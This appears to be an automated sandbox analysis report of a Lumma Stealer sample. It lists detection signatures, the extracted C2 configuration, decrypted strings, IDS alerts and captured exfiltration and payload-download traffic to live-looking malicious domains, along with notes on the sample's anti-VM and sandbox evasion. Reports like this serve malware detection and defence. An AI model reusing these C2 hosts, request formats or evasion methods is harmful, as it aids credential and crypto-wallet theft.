Edit tour

Windows Analysis Report
lumma_phothockey.exe

Overview

General Information

Sample name:	lumma_phothockey.exe
Analysis ID:	1590982
MD5:	78bd1dff11c56a3138f78ff061c34d5a
SHA1:	9ba8bbac951b07a3fd64729631fe387e0473f10e
SHA256:	18f3749e057ca1d3899cb27c94dac6394e3716ab46be15e98594865e74b779bd
Tags:	exeLummaLummaStealeruser-threatcat_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

lumma_phothockey.exe (PID: 5416 cmdline: "C:\Users\user\Desktop\lumma_phothockey.exe" MD5: 78BD1DFF11C56A3138F78FF061C34D5A)

lumma_phothockey.exe (PID: 5392 cmdline: "C:\Users\user\Desktop\lumma_phothockey.exe" MD5: 78BD1DFF11C56A3138F78FF061C34D5A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["leggelatez.lat", "shoefeatthe.lat", "burnressert.shop", "kickykiduz.lat", "washyceehsu.lat", "finickypwk.lat", "bloodyswif.lat", "savorraiykj.lat", "miniatureyu.lat"], "Build id": "jMw1IE--SHELLS"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1578700374.0000000007370000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1565730061.00000000042D5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: lumma_phothockey.exe PID: 5416	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: lumma_phothockey.exe PID: 5416	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: lumma_phothockey.exe PID: 5392	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lumma_phothockey.exe PID: 5392	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.lumma_phothockey.exe.7370000.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.lumma_phothockey.exe.45509c0.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.lumma_phothockey.exe.7370000.12.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.lumma_phothockey.exe.447118e.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.lumma_phothockey.exe.43f3140.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.lumma_phothockey.exe.45509c0.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T17:02:23.529765+0100	2028371	3	Unknown Traffic	192.168.2.7	49830	104.21.67.165	443	TCP
2025-01-14T17:02:24.529254+0100	2028371	3	Unknown Traffic	192.168.2.7	49836	104.21.67.165	443	TCP
2025-01-14T17:02:26.021477+0100	2028371	3	Unknown Traffic	192.168.2.7	49847	104.21.67.165	443	TCP
2025-01-14T17:02:27.356419+0100	2028371	3	Unknown Traffic	192.168.2.7	49856	104.21.67.165	443	TCP
2025-01-14T17:02:28.716605+0100	2028371	3	Unknown Traffic	192.168.2.7	49865	104.21.67.165	443	TCP
2025-01-14T17:02:30.072787+0100	2028371	3	Unknown Traffic	192.168.2.7	59956	104.21.67.165	443	TCP
2025-01-14T17:02:31.192544+0100	2028371	3	Unknown Traffic	192.168.2.7	59965	104.21.67.165	443	TCP
2025-01-14T17:02:32.205880+0100	2028371	3	Unknown Traffic	192.168.2.7	59975	104.21.67.165	443	TCP
2025-01-14T17:02:33.989981+0100	2028371	3	Unknown Traffic	192.168.2.7	59984	185.161.251.21	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T17:02:24.021846+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49830	104.21.67.165	443	TCP
2025-01-14T17:02:25.014949+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49836	104.21.67.165	443	TCP
2025-01-14T17:02:32.856211+0100	2054653	1	A Network Trojan was detected	192.168.2.7	59975	104.21.67.165	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T17:02:24.021846+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49830	104.21.67.165	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T17:02:25.014949+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49836	104.21.67.165	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T17:02:27.860232+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49856	104.21.67.165	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cegu.shop/g	Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtnge	Avira URL Cloud: Label: malware
Source: https://cegu.shop/&g	Avira URL Cloud: Label: malware

Found malware configuration

Source: 4.2.lumma_phothockey.exe.410000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["leggelatez.lat", "shoefeatthe.lat", "burnressert.shop", "kickykiduz.lat", "washyceehsu.lat", "finickypwk.lat", "bloodyswif.lat", "savorraiykj.lat", "miniatureyu.lat"], "Build id": "jMw1IE--SHELLS"}

Multi AV Scanner detection for submitted file

Source: lumma_phothockey.exe	Virustotal: Detection: 15%			Perma Link
Source: lumma_phothockey.exe	ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: lumma_phothockey.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: finickypwk.lat
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: shoefeatthe.lat
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: savorraiykj.lat
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: kickykiduz.lat
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: miniatureyu.lat
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: leggelatez.lat
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: washyceehsu.lat
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: bloodyswif.lat
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: burnressert.shop
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000004.00000002.3760202997.0000000000453000.00000002.00000400.00020000.00000000.sdmp	String decryptor: jMw1IE--SHELLS

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Code function: 4_2_00427FA6 CryptUnprotectData,

4_2_00427FA6

Source: lumma_phothockey.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.215.98:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:59956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:59965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:59975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.7:59984 version: TLS 1.2

Source: lumma_phothockey.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: lumma_phothockey.exe, 00000000.00000002.1575625497.0000000006500000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000003F67000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: lumma_phothockey.exe, 00000000.00000002.1575625497.0000000006500000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000003F67000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then jmp 0662AE17h	0_2_0662ABB8
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then jmp 066249CBh	0_2_06624C88
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then jmp 0662AE17h	0_2_0662ABA8
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then jmp 06625111h	0_2_066250A1
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then jmp 06625111h	0_2_066250B0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then jmp 066249CBh	0_2_06624948
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then jmp 066249CBh	0_2_06624938
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov word ptr [edi], ax	4_2_0044F079
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9B8995CDh	4_2_0044A000
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov eax, edx	4_2_0044A140
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+00000218h]	4_2_0041E709
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx-618A1FB8h]	4_2_0043D9A2
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0043D9A2
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-0F8062AEh]	4_2_00437C70
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+000001A4h]	4_2_00419C80
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00430D10
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov esi, ecx	4_2_00450ED0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_0043E063
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then push dword ptr [esp+0Ch]	4_2_0041D093
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+50C386E1h]	4_2_00438150
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then test esi, esi	4_2_0044B180
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	4_2_0043D1A0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx eax, byte ptr [esp+esi+08h]	4_2_00451270
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	4_2_004352E2
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov esi, ecx	4_2_004352E2
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*4+00001118h]	4_2_004173C0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h	4_2_004323C0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov word ptr [edi], cx	4_2_004323C0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov ebx, ecx	4_2_00435447
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00424460
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov edi, ecx	4_2_0042B412
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov ecx, eax	4_2_0044E4C4
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov dword ptr [esp+02h], 4AFD8706h	4_2_0044E4C4
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_0043B4F0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-23C15DBAh]	4_2_00450499
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-23C15DBAh]	4_2_0045049B
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov ebx, eax	4_2_00415860
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov ebp, eax	4_2_00415860
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	4_2_0041D879
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	4_2_0044D800
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then lea esi, dword ptr [ecx+ecx]	4_2_0042A880
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then jmp ecx	4_2_00435967
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	4_2_0043999F
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-5A10DF94h]	4_2_0044F9A0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov ebx, eax	4_2_00427A9C
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_00447C60
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	4_2_0042EC10
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ecx]	4_2_0044BC20
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_0042BCC0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx ebx, word ptr [ecx]	4_2_00436CCB
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	4_2_0043CCE0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	4_2_00439CF8
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_00425D63
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	4_2_00424E2D
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00439F58
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then mov edx, ecx	4_2_0044EF05
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-04h]	4_2_00425FEA

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49856 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49830 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49830 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:59975 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49836 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49836 -> 104.21.67.165:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: leggelatez.lat
Source: Malware configuration extractor	URLs: shoefeatthe.lat
Source: Malware configuration extractor	URLs: burnressert.shop
Source: Malware configuration extractor	URLs: kickykiduz.lat
Source: Malware configuration extractor	URLs: washyceehsu.lat
Source: Malware configuration extractor	URLs: finickypwk.lat
Source: Malware configuration extractor	URLs: bloodyswif.lat
Source: Malware configuration extractor	URLs: savorraiykj.lat
Source: Malware configuration extractor	URLs: miniatureyu.lat

Source: global traffic

TCP traffic: 192.168.2.7:59953 -> 162.159.36.2:53

Source: Joe Sandbox View

IP Address: 185.161.251.21 185.161.251.21

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49830 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49836 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:59956 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49865 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49856 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49847 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:59984 -> 185.161.251.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:59975 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:59965 -> 104.21.67.165:443

Source: global traffic	HTTP traffic detected: GET /iqqhm.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: u1.grapplereturnunstamped.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=08MM87VUB3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12797Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0KB5605WJEBH73T1XEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15077Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4V2Y8OAHGZM6QN5FNBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20402Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=89C64EREFXGU82User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1356Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KEEZASA1JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1061Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: burnressert.shop
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

